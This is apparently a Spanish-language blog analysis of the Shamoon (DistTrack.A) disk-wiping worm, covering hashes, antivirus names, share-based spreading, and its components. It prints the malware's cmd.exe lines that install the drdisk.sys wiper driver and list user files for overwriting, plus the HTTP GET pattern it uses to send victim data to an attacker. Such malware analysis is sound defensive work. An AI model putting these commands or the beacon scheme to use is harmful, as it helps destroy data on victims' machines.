Software Development && UnEthical Hacking
inicio hacking WiFu WiBOG MDB

Shammon / DistTrack.A
General

Ah diferencia de otros tipos de malware que se mantienen instalados en el sistema de forma silenciosa con el fin de recopilar la mayor cantidad de información, Shamoon es un malware encargado de sobrescribir y eliminar toda la información del disco duro así como la Master Boot Record del sistema afectado con el fin de dejar el sistema inservible, así mismo tiene capacidades para auto propagarse de computador a computador por medio de discos de red compartidos.

Se cree que este gusano ah sido usado para atacar las organizaciones encargadas de manejar los sistemas de energía en el medio oriente: http://arstechnica.com/security/2012/08/shamoon-malware-attack/

Gracias por el archivo Mila !!!! ;-)

MD5: d214c717a357fe3a455610b197c390aa
SHA256: f9d94c5de86aa170384f1e2e71d95ec373536899cb7985633d3ecfdb67af0f72
SHA1: 502920a97e01c2d022ac401601a311818f336542
Tamaño: 966.0 KB ( 989184 bytes )

Alias:

Avast

Win32:Malware-gen

AVG

unknown virus Win32/DH{A2cI}

BitDefender

Gen:Trojan.Heur.8u0@ILmUdSm

Comodo

Gen:Trojan.Heur.8u0@ILmUdSm

Emsisoft

Trojan.Win32.Spy!IK

F-Secure

Gen:Trojan.Heur.8u0@ILmUdSm

Kaspersky

HEUR:Trojan.Win32.Generic

McAfee-GW-Edition

W32/DistTrack

Norman

W32/Troj_Generic.DKYIW

Sophos

Troj/Mdrop-ELD

Symantec

W32.DistTrack

TrendMicro

TROJ_DISTTRACK.A

 

Contenido del archivo

 

Información del archivo en ejecución

Cuando se ejecuta el archivo el malware se instala a sí mismo como un servicio en el sistema bajo el nombre Trksvr, así mismo realiza copias en las carpetas compartidas: ADMIN$, C$\\WINDOWS, D$\\WINDOWS, E$\\WINDOWS de las maquinas de la red con el fin de propagarse con alguno de los siguientes nombres:

Posteriormente extrae 3 componentes codificados adicionales encargados de realizar las funciones de:

  1. Envío de información (PKCS7)
  2. Destrucción de la información (PKCS12)
  3. Copia una versión de 64 bits del componente Dropper (X509)

 

Componente PKCS7 – Encargado del envío de la información

Este modulo creado con el nombre de netinit.exe es el encargado de enviar información de la maquina afectada a un atacante, datos como: nombre de dominio, número de archivos sobrescritos, dirección IP del equipo atacado, etc. Son enviados de regreso a través de un Requerimiento HTTP GET con la estructura:

http://DOMINIO/ajax_modal/modal/data.asp?mydata=INFO-ARCHIVOS&uid=UID&state=ESTADO

 

Componente PKCS12 – Encargado de destruir la información

Este componente es el encargado de realizar las acciones de recolección y destrucción de información bajo el nombre de netx.exe (o alguno de los nombres nombrados inicialmente en la primera imagen), al extraer un driver (drdisk.sys) que permite sobrescribir los archivos del sistema con un fragmento de una imagen JPEG hasta finalmente destruir la MBR (Master Boot Record) en el disco duro haciendo que la maquina infectada no pueda iniciar normalmente.

Los siguientes son los comandos ejecutados para recopilar la información de los archivos a sobrescribir, dicha información se almacena en los archivos f1.inf y f2.inf:

"C:\WINDOWS\system32\cmd.exe /c sc create drdisk type= kernel start= demand binpath= System32\Drivers\drdisk.sys 2>&1 >nul"

"C:\WINDOWS\system32\cmd.exe /c sc start drdisk 2>&1 >nul"

"C:\WINDOWS\system32\cmd.exe /c dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i download 2>nul >f1.inf"

"C:\WINDOWS\system32\cmd.exe /c dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i document 2>nul >>f1.inf"

"C:\WINDOWS\system32\cmd.exe /c dir C:\Users\ /s /b /a:-D 2>nul | findstr -i download 2>nul >>f1.inf"

"C:\WINDOWS\system32\cmd.exe /c dir C:\Users\ /s /b /a:-D 2>nul | findstr -i document 2>nul >>f1.inf"

"C:\WINDOWS\system32\cmd.exe /c dir C:\Users\ /s /b /a:-D 2>nul | findstr -i picture 2>nul >>f1.inf"

"C:\WINDOWS\system32\cmd.exe /c dir C:\Users\ /s /b /a:-D 2>nul | findstr -i video 2>nul >>f1.inf"

"C:\WINDOWS\system32\cmd.exe /c dir C:\Users\ /s /b /a:-D 2>nul | findstr -i music 2>nul >>f1.inf"

"C:\WINDOWS\system32\cmd.exe /c dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i desktop 2>nul >f2.inf"

"C:\WINDOWS\system32\cmd.exe /c dir C:\Users\ /s /b /a:-D 2>nul | findstr -i desktop 2>nul >>f2.inf"

"C:\WINDOWS\system32\cmd.exe /c dir C:\Windows\System32\Drivers /s /b /a:-D 2>nul >>f2.inf"

"C:\WINDOWS\system32\cmd.exe /c dir C:\Windows\System32\Config /s /b /a:-D 2>nul | findstr -v -i systemprofile 2>nul >>f2.inf"

"C:\WINDOWS\system32\cmd.exe /c dir f1.inf /s /b 2>nul >>f1.inf"

"C:\WINDOWS\system32\cmd.exe /c dir f2.inf /s /b 2>nul >>f1.inf"

Después de estar en ejecución por algún tiempo se genera un problema en el driver Ntfs.sys causando una famosa pantalla azul de la muerte o BSOD (Blue Screen of Death) seguido a esto se reinicia el sistema para obtener el mensaje: “Operating System not found”

Inicio       ||       Comunidad       ||      Servicios       ||      Proyectos       ||      Hacking       ||      Contáctenos